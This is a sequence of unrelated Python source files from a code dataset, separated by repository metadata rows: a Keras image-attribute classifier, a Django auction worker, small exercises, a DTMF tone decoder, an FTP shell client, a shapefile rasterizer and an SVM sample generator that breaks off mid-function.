        y_train = self.train.loc[:, label_col]
        y_test = self.test.loc[:, label_col]
        self.sanity_check_classification(label_col, categorical_cols=[label_col])
        if numpy_array:
            # ``.values`` instead of DataFrame.as_matrix(), which was
            # deprecated in pandas 0.23 and removed in 1.0.
            return X_train.values, X_test.values, y_train.values, y_test.values
        else:
            return X_train, X_test, y_train, y_test

    def sanity_check_classification(self, label, categorical_cols):
        """
        Sanity-check the split for classification.

        Records the set of observed class labels in ``self.class_labels``
        and raises if a class is present in neither split.  (Note: a label
        drawn from the union of both splits is always in at least one, so
        the ``and`` condition below can only fire if the splits are mutated
        between the union and the check -- preserved from the original.)

        :param label: name of the label column.
        :param categorical_cols: currently unused; kept for interface
            stability.
        :return: None; raises RuntimeError on a bad split.
        """
        train_labels = self.train.loc[:, label]
        test_labels = self.test.loc[:, label]
        # pd.concat instead of Series.append, which was deprecated in pandas
        # 1.4 and removed in 2.0.
        all_labels = pd.concat([train_labels, test_labels]).reset_index(drop=True)
        self.class_labels = all_labels.unique()
        # Materialise the membership lists once instead of once per label.
        train_label_values = train_labels.tolist()
        test_label_values = test_labels.tolist()
        for each_label in self.class_labels:
            if each_label not in train_label_values and each_label not in test_label_values:
                raise RuntimeError('Splitting was not good!!')

    @abstractmethod
    def apply(self, kind=None, prediction_mode='absolute', classification=True):
        # Currently ensembles are not supported
        pass
| true |
b7e42971319ee8c86fb9607419eb70b815de7484 | Python | MuLx10/DL3 | /DL3.py | UTF-8 | 9,267 | 3.4375 | 3 | [] | no_license |
# coding: utf-8
# ### Importing libraries
# In[10]:
import numpy as np
import pandas as pd
#import seaborn as sns
#import matplotlib.pyplot as plt
from sklearn.datasets import load_files
from glob import glob
#get_ipython().magic(u'matplotlib inline')
# ### Data Exploration
# In[11]:
# Reading the train and test meta-data files
train = pd.read_csv('data/train.csv')
test = pd.read_csv('data/test.csv')
# In[12]:
# NOTE(review): bare expressions such as ``train.head()`` below are notebook
# cell leftovers; run as a plain script they compute a value and discard it.
train.head()
# In[15]:
# Shape of training and test datasets
print ('Training dataset consists of {} images with {} attributes'.format(train.shape[0], train.shape[1]-1))
# Shape of training and test datasets
print ('Testing dataset consists of {} images.'.format(test.shape[0]))
# Let's have a look at the columns of the training data.
# In[16]:
print('Columns in the dataset:\n\n', train.columns)
# ### Data Visualization
#
# Now we will visualize our data to get a better understanding of it.
# We will begin with visualizing the distribution of the labels in the training data.
# In[21]:
# All columns except the image file name are binary attribute labels.
cols = list(train.columns)
cols.remove('Image_name')
cols.sort()
# In[22]:
count_labels = train[cols].sum()
# In[24]:
count_labels.sort_values(inplace=True)
# From the figure below, we can see that there are 85 different attributes/ labels and Attrib_21 is common in almost all animals while Attrib_66 is rare.
# In[25]:
'''
plt.figure(figsize=(18, 8))
ax = sns.barplot(x=count_labels.index, y=count_labels.values)
ax.set_xticklabels(labels=count_labels.index,rotation=90, ha='right')
ax.set_ylabel('Count')
ax.set_xlabel('Attributes/ Labels')
ax.title.set_text('Label/ Attribute distribution')
plt.tight_layout()
'''
# In[26]:
# Binary label matrix, one row per image and one column per attribute.
label_data = np.array(train[cols])
# Next we will compute the co-occurrence matrix for the labels.
# In[27]:
# Compute the cooccurrence matrix
cooccurrence_matrix = np.dot(label_data.transpose(), label_data)
print('\n Co-occurence matrix: \n', cooccurrence_matrix)
# In[28]:
# Compute the cooccurrence matrix in percentage
# Reference: https://stackoverflow.com/questions/20574257/constructing-a-co-occurrence-matrix-in-python-pandas/20574460
cooccurrence_matrix_diagonal = np.diagonal(cooccurrence_matrix)
with np.errstate(divide = 'ignore', invalid='ignore'):
    cooccurrence_matrix_percentage = np.nan_to_num(np.true_divide(cooccurrence_matrix, cooccurrence_matrix_diagonal))
# In[29]:
print('\n Co-occurrence matrix paercentage: \n', cooccurrence_matrix_percentage)
# From the plot of the co-occurence matrix (below), we can see which labels(or attributes) genreally occur together.
# In[30]:
'''
ax = plt.figure(figsize=(18, 12))
sns.set(style='white')
# Generate a custom diverging colormap
cmap = sns.diverging_palette(200, 10, as_cmap=True)
# Draw the heatmap with the mask and correct aspect ratio
sns.heatmap(cooccurrence_matrix_percentage, cmap=cmap, center=0, square=True, linewidths=0.15, cbar_kws={"shrink": 0.5})
plt.title('Co-occurrence Matrix of the Labels')
'''
# We define the paths to the image folders.
# In[31]:
TRAIN_PATH = 'data/train/'
TEST_PATH = 'data/test/'
# In[32]:
img_path = TRAIN_PATH+str(train.Image_name[0])
# We import the OpenCV and Python Image library for image manipulation.
# In[33]:
from PIL import Image
import cv2
# In[34]:
# NOTE(review): in a notebook this cell displays the image; as a script the
# opened image object is simply discarded.
Image.open(img_path)
# The computer cannot see shapes or colors. It reads each image as an array of numbers.
# In[35]:
img = cv2.imread(img_path)
img
# In[36]:
# Shape of each image
img.shape
# In[38]:
# Extracting label columns
label_cols = list(set(train.columns) - set(['Image_name']))
label_cols.sort()
# In[39]:
# Extracting labels corresponding to image at the zeroth index of the training dataset.
# NOTE(review): ``iloc[0][2:]`` skips the first TWO columns even though only
# 'Image_name' is a non-label column -- confirm the intended offset.
labels = train.iloc[0][2:].index[train.iloc[0][2:] == 1]
# We plot the Animal and the attributes/ labels corresponding to it.
# In[43]:
'''
txt = 'Labels/ Attributes: ' + str(labels.values)
ax = plt.figure(figsize=(10, 10))
ax.text(.5, .05, txt, ha='center')
plt.imshow(img)
'''
# In the image above we can see a Rhinoceros and all the attributes associated with him.
# ### Data Preprocessing
#
# Next, we will preprocess our image data before supplying it to the training model.
# In[44]:
from tqdm import tqdm
def read_img(img_path, size=(128, 128)):
    """Load an image from disk and resize it.

    :param img_path: path to the image file.
    :param size: ``(width, height)`` passed to ``cv2.resize``; defaults to
        the 128x128 input size the model expects, so existing callers are
        unaffected.
    :return: the resized image as a numpy array (BGR channel order, as
        produced by ``cv2.imread``).  Note ``cv2.imread`` returns None for
        unreadable paths, which would make ``cv2.resize`` raise.
    """
    img = cv2.imread(img_path)
    img = cv2.resize(img, size)
    return img
# The above function reads an image and resizes it to 128 x 128 dimensions and returns it.
# In[28]:
#temp = train.sample(frac=0.3)
# In[29]:
#train = temp.reset_index(drop=True)
# In[30]:
# Load every training image into memory (list of 128x128x3 arrays).
train_img = []
for img_path in tqdm(train.Image_name.values):
    train_img.append(read_img(TRAIN_PATH + img_path))
# In[31]:
import gc
# In[32]:
# Convert the image data into an array.
# Since the range of color(RGB) is in the range of (0-255).
# Hence by dividing each image by 255, we convert the range to (0.0 - 1.0)
X_train = np.array(train_img, np.float32) / 255.
# In[33]:
# Free the intermediate list before the next large allocation.
del train_img
gc.collect()
# Next, we will calculate the mean and standard deviation.
# In[34]:
# Per-pixel statistics across the whole training set.
mean_img = X_train.mean(axis=0)
# In[35]:
std_dev = X_train.std(axis = 0)
# Next, we will normalize the image data using the following formula:
#
# <center>** X = (x - mean of x)/(std. deviation of x)**<center/>
#
# In[36]:
X_norm = (X_train - mean_img)/ std_dev
# In[37]:
X_norm.shape
# In[38]:
del X_train
# In[39]:
gc.collect()
# In[40]:
y = train[label_cols].values
# In[41]:
from sklearn.model_selection import train_test_split
# Finally, we create the training and validation sets.
# In[42]:
Xtrain, Xvalid, ytrain, yvalid = train_test_split(X_norm, y, test_size=0.05, random_state=47)
# In[43]:
del X_norm
gc.collect()
# ### Model Architecture
#
# We will be using the Keras framework to create our model. But you may also use other frameworks like Tensorflow, Pytorch, etc.
# In[44]:
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D, BatchNormalization
from keras.callbacks import EarlyStopping, ModelCheckpoint
from keras import backend as K
print(K.image_data_format(),Xtrain.shape)
# For this problem, we create a model from scratch. We will use a Sequential model, which is a linear stack of layers to build this model.
# In[45]:
input_shape = Xtrain.shape[1:]
gc.collect()
# In[46]:
# Stacked Conv2D/pooling feature extractor; the final sigmoid Dense layer
# emits one independent probability per attribute (multi-label, 85 outputs).
model = Sequential()
model.add(BatchNormalization(input_shape=Xtrain.shape[1:]))
#model.add(Conv2D(32, kernel_size=(3, 3), activation= 'relu', input_shape=input_shape))
model.add(Conv2D(32, kernel_size=(3, 3), activation= 'relu'))
model.add(Conv2D(64, kernel_size=(3, 3), activation= 'relu', padding='same'))
model.add(Conv2D(64, kernel_size=(3, 3), activation= 'relu'))
model.add(MaxPooling2D(pool_size=(2,2)))
model.add(Dropout(0.25))
model.add(Conv2D(128, kernel_size=(3, 3), activation= 'relu', padding='same'))
model.add(Conv2D(128, kernel_size=(3, 3), activation= 'relu'))
model.add(MaxPooling2D(pool_size=(2,2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dropout(0.5))
model.add(Dense(85, activation='sigmoid'))
# Here we generate the summary our model. We can see that there are approximately 10 million parameters to train.
# In[47]:
model.summary()
# Next, we define our loss function, the optimizer and metrics for our model.
# In[48]:
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
# In[49]:
# NOTE(review): ``early_stops`` is created but never passed to ``model.fit``
# below (only ``checkpointer`` is), so early stopping is effectively disabled.
early_stops = EarlyStopping(patience=3, monitor='val_acc')
checkpointer = ModelCheckpoint(filepath='weights.best.eda.hdf5', verbose=1, save_best_only=True)
# Finally, we train our model.
# In[50]:
model.fit(Xtrain, ytrain, validation_data=(Xvalid, yvalid), epochs=47, batch_size=32, callbacks=[checkpointer], verbose=1)
# In[52]:
# Threshold the sigmoid outputs at 0.5 via round() to get 0/1 predictions.
train_pred = model.predict(Xtrain).round()
# In[53]:
from sklearn.metrics import f1_score
f1_score(ytrain, train_pred, average='samples')
# In[54]:
valid_pred = model.predict(Xvalid).round()
# In[56]:
f1_score(yvalid, valid_pred, average='samples')
# In[58]:
#del Xtrain
#del Xvalid
#del ytrain
#del yvalid
gc.collect()
# ### Prediction on Test Set
#
# Now that we have built and trained our model, we will use it to predict the labels of the test images.
# In[51]:
from sklearn.metrics import f1_score
# In[59]:
test_img = []
for img_path in tqdm(test.Image_name.values):
    test_img.append(read_img(TEST_PATH + img_path))
# In[60]:
X_test = np.array(test_img, np.float32) / 255.
# In[61]:
del test_img
gc.collect()
# The test images are normalized below.
# In[62]:
# NOTE(review): these statistics are recomputed from the *test* set, whereas
# the network was trained on images normalised with the *training* set's
# mean/std -- confirm this train/test normalisation mismatch is intended.
mean_img = X_test.mean(axis=0)
# In[63]:
std_dev = X_test.std(axis = 0)
# In[64]:
X_norm_test = (X_test - mean_img)/ std_dev
# In[65]:
del X_test
gc.collect()
# Predict the labels on the test images.
# In[66]:
# Restore the best checkpoint saved during training before predicting.
model.load_weights('weights.best.eda.hdf5')
# In[67]:
pred_test = model.predict(X_norm_test).round()
# In[68]:
# NOTE(review): ``np.int`` is deprecated and removed in NumPy 1.24+;
# ``int`` or ``np.int64`` would be needed on newer NumPy versions.
pred_test = pred_test.astype(np.int)
# #### Creating the submission file
# In[70]:
subm = pd.DataFrame()
# In[71]:
subm['Image_name'] = test.Image_name
# In[72]:
label_df = pd.DataFrame(data=pred_test, columns=label_cols)
# In[73]:
subm = pd.concat([subm, label_df], axis=1)
# In[74]:
subm.to_csv('submit.csv', index=False)
# END.....
| true |
a60ad21c6c1e4e5996e8f2d46dc6f365f2942ab2 | Python | danoc93/auctioneer | /worker/auction/complete_bids.py | UTF-8 | 1,489 | 2.6875 | 3 | [] | no_license | import time
from django.db.models import Max
from django.utils import timezone
from auctions.models.Auction import Auction
from auctions.models.AuctionStatus import AuctionStatusOption, AuctionStatus
from auctions.models.Bid import Bid
"""
This worker fulfills expired auctions and declares winner bids.
"""
def complete_bids():
    """Run ten polling rounds: fulfil expired auctions, sleeping 5s after each."""
    for _ in range(10):
        check_bids()
        time.sleep(5)
def check_bids():
    """Close every expired OPEN auction and flag its winning bid.

    Each expired auction is set to FULFILLED; its highest bid (earliest
    bid wins ties) is marked as the winner when any bid exists.
    """
    print('Finding all expired auctions @', timezone.now())
    auctions = Auction.objects.filter(
        status__value=AuctionStatusOption.OPEN.value,
        expiration_time_utc__lte=timezone.now()
    )
    if len(auctions) == 0:
        print('No unfulfilled auctions found')
        return
    new_status = AuctionStatus.objects.filter(value=AuctionStatusOption.FULFILLED.value).first()
    for auction in auctions:
        auction.status = new_status
        auction.save()
        # BUG FIX: the max bid amount must be computed over THIS auction's
        # bids; the original aggregated over the whole Bid table, so a
        # higher bid on another auction could leave this one winnerless.
        winning_bid_amount = Bid.objects.filter(auction=auction).aggregate(
            Max('bid_amount'))['bid_amount__max']
        winning_bid = Bid.objects.filter(
            auction=auction, bid_amount=winning_bid_amount
        ).order_by('bid_time_utc').first()
        if winning_bid:
            winning_bid.is_winning_bid = True
            winning_bid.save()
            print('Bid {} set as winner for auction {}'.format(winning_bid.id, auction.id))
            # Here we could potentially email people.
        else:
            print('Auction {} has no winning bid'.format(auction.id))
| true |
757ef75b06d8738f21402d8f7fdfad06b0f83fe2 | Python | rcsraymer/Project_Euler | /001.py | UTF-8 | 517 | 4.4375 | 4 | [] | no_license | # Question
# If we list all the natural numbers below 10 that are multiples of 3 or 5, we get 3, 5, 6 and 9. The sum of these multiples is 23.
# Find the sum of all the multiples of 3 or 5 below 1000.
# Solution
# Use the modulus operator to find where i in range of 1000 has no remainder when divisible by 3 or 5
# Add only those values to a list
# Sum the list
# Collect every natural number below 1000 that is a multiple of 3 or 5,
# then print their sum (Project Euler problem 1).
lst = [i for i in range(1000) if i % 3 == 0 or i % 5 == 0]
print(sum(lst))
## 233168 is the sum | true |
029b3e03fec3863fa9165a04b0817df2922a7e85 | Python | Aayushs1602/memes | /table of 69.py | UTF-8 | 38 | 2.953125 | 3 | [] | no_license | for i in range(1,11):
print(69 * i)
| true |
2387eb6a5b9fa886b6f764da99bd24c0290f1684 | Python | Git-Clarusway/CaseStudy | /CS-8/ValidateCS.py | UTF-8 | 1,473 | 3.671875 | 4 | [] | no_license | # Customer should be checked for customer's name,
# customer's username, and customer's birthday.
# users database - a particular index corresponds to a specific user
# users database - a particular index corresponds to a specific user
surnames = ["Oliver", "Smith", "Brown"]
birth_days = [15, 22, 8]
birth_months = [3, 6, 12]
birth_years = [1984, 1994, 2001]
while True:
try:
name=input('Please enter your name : ').title()
if name in names:
user_id=names.index(name)
surname=input('Please enter your surname : ').title()
info=surnames[user_id],birth_months[user_id],birth_days[user_id],birth_years[user_id]
if surname in info:
u_date=input('Please enter your birthday (MM/DD/YYYY) ')
u_month,u_day,u_year=u_date.split('/')
if len(u_month+u_day+u_year) == 8:
if int(u_month) in info and int(u_day) in info and int(u_year) in info:
print('You are a costumer')
break
else:
print('You are not a costumer')
else:
print('You have entered an incorrect value!')
else:
print('You are not a costumer')
else:
print('You are not a costumer')
except:
print('You have entered an incorrect value!') | true |
97cbd1756c3dd4f62cc10a1bf09aa2fff5a09b4b | Python | decoejz/cFProj2 | /DTMF/recebe.py | UTF-8 | 2,323 | 3 | 3 | [] | no_license | from signalTeste import *
import numpy as np
import sounddevice as sd
import matplotlib.pyplot as plt
#import wave
import time
#import pickle
import peakutils
from peakutils.plot import plot as pplot
# DTMF column tone frequencies (Hz)
freq1 = 1209
freq2 = 1336
freq3 = 1477
# DTMF row tone frequencies (Hz)
freq4 = 697
freq5 = 770
freq6 = 852
freq7 = 941
# Sum of row + column frequencies - one signature per keypad key
um = freq4 + freq1
dois = freq4 + freq2
tres = freq4 + freq3
quatro = freq5 + freq1
cinco = freq5 + freq2
seis = freq5 + freq3
sete = freq6 + freq1
oito = freq6 + freq2
nove = freq6 + freq3
zero = freq7 + freq2
# List of all candidate tone frequencies
numbers = [freq1,freq2,freq3,freq4,freq5,freq6,freq7]
# Key signatures indexed by digit: totals[d] is the frequency sum for key d
totals = [zero, um, dois, tres, quatro, cinco, seis, sete, oito, nove]
looping = True
while looping:
    # print("entrou no looping")
    # Sample rate and capture duration
    fs = 44100
    cont = np.linspace(0, 88200, 88200)
    duration = 2 # seconds
    # Record the audio signal from the microphone
    dirtySignal = sd.rec(int(duration * fs), samplerate=fs, channels=1)
    sd.wait()
    #time.sleep(1)
    # Clean the signal -- keep channel 0 only (works around an audio-card quirk)
    dirtySignal = dirtySignal[:,0]
    # sd.play(dirtySignal, fs)
    # Helper object used to compute the FFT
    sig = signalMeu()
    freq, t = sig.calcFFT(dirtySignal,fs)
    # Locate the spectral peaks
    indexes = peakutils.indexes(t, thres=3, min_dist=70)
    # Interpolated peak positions (frequencies)
    peaks_x = peakutils.interpolate(freq,t, ind=indexes)
    print("picos: ", peaks_x)
    # Accumulator for recognized DTMF tone frequencies
    anser = []
    # When exactly 2 peaks were found, match each to the nearest known tone
    if len(peaks_x) == 2:
        for i in numbers:
            if abs(i - peaks_x[0]) < 2:
                anser.append(i)
            elif abs(i - peaks_x[1]) < 2:
                anser.append(i)
    # Sum the two matched tones to build the key signature.
    # NOTE(review): raises IndexError when fewer than two tones matched
    # (e.g. peak count != 2) - confirm whether a retry was intended here.
    total = anser[0] + anser[1]
    # If the sum matches a known signature, report the pressed key
    if total in totals:
        tecla = totals.index(total)
        print("Tecla pressionad: ", tecla)
    # Plot the recorded audio signal
    plt.plot(cont,dirtySignal)
    plt.title("Sinal recebido")
    plt.show()
    # Plot the spectrum with the detected peaks
    pplot(freq, t, indexes)
    plt.title('Frequências')
    plt.show()
    # All good - leave the loop
    looping = False
| true |
a63b5ee8331de090c005be527ea0bb46b91c755e | Python | JavierLopatin/Python-Remote-Sensing-Scripts | /Rasterize.py | UTF-8 | 1,122 | 2.71875 | 3 | [] | no_license | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Rasterize all shapefile columns into a multiband raster
Created on Sat Dec 5 11:44:50 2020
@author: Javier Lopatin
"""
import geopandas as gpd
from geocube.api.core import make_geocube
import argparse
# create the arguments for the algorithm
parser = argparse.ArgumentParser()
# NOTE(review): the help text says 'Input raster' but this option is the
# input shapefile - likely a copy-paste slip in the help string.
parser.add_argument('-i','--inputShapefile',
                    help='Input raster', type=str, required=True)
parser.add_argument('-r','--resolution',
                    help='Output resolution', type=float)
# NOTE(review): --preprop is parsed but never read below - confirm intended.
parser.add_argument('-p','--preprop',
                    help='Resolution in a tuple, e.g. (-5, 5) for a 5X5 m pixels.',
                    action="store_true", default=False)
parser.add_argument('--version', action='version', version='%(prog)s 1.0')
args = vars(parser.parse_args())
# data inputs/outputs
inData = args["inputShapefile"]
res = args["resolution"]
# Output lives next to the input, 4-char extension replaced by _raster.tif.
outraster = inData[:-4]+'_raster.tif'
# load shapefile
s = gpd.read_file(inData)
# rasterize: (-res, res) follows the (-5, 5) convention from the help text.
print("Rasterizing...")
out_grid = make_geocube(vector_data=s, resolution=(-res, res))
print('Done!')
# save to disk
print('Saving to disk...')
out_grid.rio.to_raster(outraster)
print('Done!')
| true |
5c06bab21cdd98108e5d574f700f84d6fc3fd028 | Python | nex3z/think-bayes-playground | /c2/Monty.py | UTF-8 | 385 | 2.5625 | 3 | [] | no_license | from common.Pmf import Pmf
class Monty(Pmf):
    """Pmf of door hypotheses for the Monty Hall problem."""

    def likelihood(self, data, hypo):
        """Likelihood of Monty opening door `data` given the car is behind `hypo`."""
        if hypo == data:
            return 0
        return 0.5 if hypo == 'A' else 1

    def update(self, data):
        """Reweight every hypothesis by its likelihood, then renormalize."""
        for hypo in self.values():
            self.mult(hypo, self.likelihood(data, hypo))
        self.normalize()
| true |
4cb236b2b80a8d0f83219bbdd5d70e9b373d365b | Python | AdamZhouSE/pythonHomework | /Code/CodeRecords/2973/59140/290174.py | UTF-8 | 546 | 3.015625 | 3 | [] | no_license | def permutation(s_list, start, last):
if start >= last:
sets.append("".join(s_list))
else:
for i in range(start, last):
s_list[i], s_list[start] = s_list[start], s_list[i]
permutation(s_list, start + 1, last)
s_list[i], s_list[start] = s_list[start], s_list[i]
# Read a message, then for each of n keys count how many substrings of the
# message equal any distinct permutation of that key.
message = input()
n = int(input())
sum = 0  # NOTE(review): shadows the builtin sum(); kept as-is
for i in range(0, n):
    sets = []  # global accumulator filled by permutation()
    key = input()
    permutation(list(key), 0, len(key))
    sets=list(set(sets))  # deduplicate repeated permutations
    for j in sets:
        # str.count counts non-overlapping occurrences.
        sum += message.count(j)
print(sum)
c153f86643770d306279ac1a30efa287124eda0b | Python | vinismarques/codigos-python | /gerenciamento_bancario.py | UTF-8 | 890 | 3.875 | 4 | [] | no_license | class Cliente:
    def __init__(self, nome, cpf, idade):
        """Store the client's name (nome), CPF and age (idade)."""
        self.nome = nome
        self.cpf = cpf
        self.idade = idade
    def __str__(self):
        # Human-readable summary used by print(cliente).
        return f'Nome: {self.nome}, CPF: {self.cpf}, Idade: {self.idade}'
class Conta():
    """A bank account owned by a client, holding a running balance."""

    def __init__(self, cliente, saldo):
        self.cliente = cliente
        self.saldo = saldo

    def sacar(self, valor):
        # Withdraw; no overdraft check is performed.
        self.saldo = self.saldo - valor

    def depositar(self, valor):
        self.saldo = self.saldo + valor

    def consultarSaldo(self):
        """Return the current balance."""
        return self.saldo
# Demo: create a client and account, then exercise deposit/withdraw.
vinicius = Cliente('Vinicius', '027242', '25')
conta = Conta(vinicius, 390)
# print(vinicius.nome, vinicius.cpf, vinicius.idade)
# print(f'Nome: {vinicius.nome}, CPF: {vinicius.cpf}, Idade: {vinicius.idade}')
print(vinicius)
conta.depositar(10)
# Overdraws slightly - Conta.sacar performs no balance check.
conta.sacar(390.5)
print(f'Cliente {conta.cliente.nome} tem R$ {conta.consultarSaldo() :.2f}'
      f' em sua conta')
| true |
63b0df9ad4eb2705c1d69f5a5c2ac7d35e12e83f | Python | aoeuidht/homework | /leetcode/palindrome_number.py | UTF-8 | 722 | 3.546875 | 4 | [] | no_license | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
"""Determine whether an integer is a palindrome. Do this without extra space.
"""
class Solution:
    """LeetCode "Palindrome Number": decide whether an integer reads the
    same forwards and backwards, without converting it to a string."""

    # @return a boolean
    def isPalindrome(self, x):
        """Return True when x is a palindrome; negatives never are."""
        if x < 0:
            return False
        # Count the digits of x.
        # BUG FIX: the original used '/', which is float division on
        # Python 3 and broke both the digit count and the comparisons;
        # floor division '//' behaves identically on Python 2 and 3.
        digits = 0
        remaining = x
        while remaining > 0:
            remaining //= 10
            digits += 1
        # Compare one leading/trailing digit pair per iteration.
        pairs = digits // 2
        power = digits - 1
        while pairs > 0:
            if (x % 10) == (x // (10 ** power)):
                x = x % (10 ** power)  # drop the leading digit
                x //= 10               # drop the trailing digit
                pairs -= 1
                power -= 2
            else:
                break
        # All pairs matched iff the counter reached zero.
        return pairs < 1
# Command-line entry point (Python 2 print syntax): pass the integer to test
# as the first argument.
if __name__ == '__main__':
    s = Solution()
    print s.isPalindrome(int(sys.argv[1]))
| true |
a7110115a79554d22d3e20dbe44f8ad466bef608 | Python | filhit/dsoulstest_server_modpack | /dumpnodes/avgcolors.py | UTF-8 | 670 | 3.09375 | 3 | [] | no_license | #!/usr/bin/env python3
import sys
from math import sqrt
from PIL import Image
# Usage check: require an input image path argument.
if len(sys.argv) < 2:
    print("Prints average color (RGB) of input image")
    print("Usage: %s <input>" % sys.argv[0])
    exit(1)
# NOTE(review): .split()[0] truncates the path at the first whitespace, so
# file names containing spaces cannot be opened - confirm intended.
inp = Image.open(sys.argv[1].split()[0]).convert('RGBA')
ind = inp.load()
# One list of squared channel values per RGB channel; mostly-transparent
# pixels (alpha < 128) are skipped.
cl = ([], [], [])
for x in range(inp.size[0]):
    for y in range(inp.size[1]):
        px = ind[x, y]
        if px[3] < 128: continue # alpha
        cl[0].append(px[0]**2)
        cl[1].append(px[1]**2)
        cl[2].append(px[2]**2)
if len(cl[0]) == 0:
    print("Didn't find average color for %s" % sys.argv[1], file=sys.stderr)
    print("0 0 0")
else:
    # Root of the mean of squared values, per channel.
    cl = tuple(sqrt(sum(x)/len(x)) for x in cl)
    print("%d %d %d" % cl)
| true |
73da54e401643de521bd4314b566aefd71062d11 | Python | litvinchuck/python-workout | /ftp.py | UTF-8 | 5,795 | 3.09375 | 3 | [
"MIT"
] | permissive | """A minimalistic FTP util. A shell client for Python ftplib
getwelcome - Return the welcome message sent by the server in reply to the initial connection. (This message sometimes
contains disclaimers or help information that may be relevant to the user.)
connect [host=''] [port=0] [timeout=None] - Connect to the given host and port. The default port number is 21, as
specified by the FTP protocol specification. It is rarely needed to specify a different port number. This function
should be called only once for each instance; it should not be called at all if a host was given when the instance was
created. All other methods can only be used after a connection has been made. The optional timeout parameter specifies
a timeout in seconds for the connection attempt. If no timeout is passed, the global default timeout setting will be
used.
login [user='anonymous'] [passwd=''] [acct=''] - Log in as the given user. The passwd and acct parameters are optional
and default to the empty string. If no user is specified, it defaults to 'anonymous'. If user is 'anonymous', the
default passwd is 'anonymous@'. This function should be called only once for each instance, after a connection has been
established; it should not be called at all if a host and user were given when the instance was created. Most FTP
commands are only allowed after the client has logged in. The acct parameter supplies “accounting information”;
few systems implement this.
set_debuglevel [level] - Set the instance’s debugging level. This controls the amount of debugging output printed. The
default, 0, produces no debugging output. A value of 1 produces a moderate amount of debugging output, generally a
single line per request. A value of 2 or higher produces the maximum amount of debugging output, logging each line sent
and received on the control connection.
nlst [directory] - Return a list of file names as returned by the NLST command. The optional argument is a directory to
list (default is the current server directory). Multiple arguments can be used to pass non-standard options to the NLST
command.
dir [directory] - Produce a directory listing as returned by the LIST command, printing it to standard output. The
optional argument is a directory to list (default is the current server directory).
cwd [pathname] - Set the current directory on the server.
mkd [pathname] - Create a new directory on the server.
pwd - Return the pathname of the current directory on the server.
rmd [dirname] - Remove the directory named dirname on the server.
size [filename] - Request the size of the file named filename on the server. On success, the size of the file is
returned as an integer, otherwise None is returned. Note that the SIZE command is not standardized, but is supported by
many common server implementations.
rename [fromname] [toname] - Rename file fromname on the server to toname.
delete [filename] - Remove the file named filename from the server. If successful, returns the text of the response.
retrieve [filename] [destination] - Retrieve a file in binary transfer mode and save it to destination folder.
store [filename] [origin] - Store a file located in origin using binary transfer mode.
quit - Send a QUIT command to the server and close the connection.
exit - Send a QUIT command to the server and close the connection. Same as quit.
close - Send a QUIT command to the server and close the connection. Same as quit.
help - display help
"""
import os
import sys
from ftplib import FTP, error_perm, all_errors
from getpass import getpass
from ftp.ftptracker import FTPTracker
# Prefer gnureadline, fall back to the stdlib readline, and run without
# line-editing support when neither is available.
# BUG FIX: the original imported the stdlib readline unconditionally
# afterwards, clobbering a successful gnureadline import.
try:
    import gnureadline as readline
except ImportError:
    try:
        import readline
    except ImportError:
        readline = None
# Interactive session: collect connection details, connect and log in, then
# run a read-eval loop that maps typed commands onto ftplib.FTP methods.
print("FTP util\n")
host = input("Enter FTP hostname: ").replace('http://', '').replace('ftp://', '')
user = input("Enter username: ")
password = getpass("Enter password: ")
try:
    ftp = FTP(host)
except all_errors as error:
    # Could not connect: show the error and wait for a key before exiting.
    print(error)
    input()
    sys.exit()
else:
    print(ftp.getwelcome())
    try:
        print(ftp.login(user, password))
    except error_perm as error:
        print(error)
        input()
        sys.exit()
if readline:
    readline.set_startup_hook()  # Enables input history
while True:
    try:
        user_input = input(">> ").split(" ")
        command = user_input[0]
        arguments = user_input[1:]
        if command in ('exit', 'quit', 'close'):
            print(ftp.quit())
            sys.exit()
        elif command == 'help':
            print(__doc__)
        elif command == 'retrieve':
            # Binary download with progress tracking; the destination
            # defaults to the remote file name.
            tracker = FTPTracker(ftp.size(arguments[0]))
            if len(arguments) < 2:
                arguments.append(arguments[0])
            with open(arguments[1], 'wb') as file:
                print(ftp.retrbinary('RETR {}'.format(arguments[0]),
                                     lambda block: (file.write(block), tracker.handle(block))))
        elif command == 'store':
            # Binary upload with progress tracking; the origin defaults to
            # the remote file name.
            tracker = FTPTracker(os.path.getsize(arguments[0]))
            if len(arguments) < 2:
                arguments.append(arguments[0])
            with open(arguments[1], 'rb') as file:
                print(ftp.storbinary('STOR {}'.format(arguments[0]), file, callback=tracker.handle))
        elif not command:
            continue
        else:
            # Fall through to the matching ftplib.FTP method; digit-only
            # arguments are converted to int (e.g. connect's port).
            func = getattr(ftp, command)
            arguments = list(map(lambda argument: int(argument) if argument.isdigit() else argument, arguments))
            result = func(*arguments)
            if result:
                print(result)
    except all_errors as error:
        print(error)
    except (TypeError, IndexError):
        print('Invalid amount of arguments')
    except AttributeError:
        print('Unknown command: "{}"'.format(command))
| true |
7ac59e6226556a4896f2695c2efdfe84ab408af2 | Python | sherry-roar/Roar | /mysvm.py | UTF-8 | 6,619 | 2.78125 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env python
# -*- coding:utf-8 -*-
__author__ = 'Mr.R'
import numpy as np
from sklearn import svm
from sklearn.model_selection import KFold
# import sklearn
import matplotlib.pyplot as plt
# import pylab as pl
import time
np.random.seed(1)  # global seed for reproducible sample generation
sample_num=1000  # number of generated samples
t='nonlinear'  # dataset type: 'linear' or 'nonlinear' decision boundary
k=5  # number of cross-validation folds
c=[1e-7,1e-5,1e-3,1e-1]  # candidate SVM penalty factors
def generator(n, t):
    """Create n random 2-D samples in [0, 10)^2 with labels in {-1, 1}.

    t == 'linear':    label by the sign of x0 - x1.
    t == 'nonlinear': label by the sign of (x0 - 4)^2 + x1 - 8.
    Any other t returns an all-zero label vector.
    """
    X = 10 * np.random.random((n, 2))
    if t == 'linear':
        Y = np.where(X[:, 0] > X[:, 1], 1, -1)
    elif t == 'nonlinear':
        Y = np.where((X[:, 0] - 4) ** 2 + X[:, 1] > 8, 1, -1)
    else:
        Y = np.zeros(n)
    return X, Y
def cross_va(X,Y,k,i):
    """Split (X, Y) with KFold and return the LAST fold's split as
    (X_test, X_train, Y_test, Y_train).

    NOTE(review): `data` is shuffled but never used for the split
    (kf.split runs on the unshuffled X), and the parameter `i` is unused -
    every call returns the same, last KFold split. Confirm whether `i` was
    meant to select the i-th fold.
    """
    # k fold cross validate model
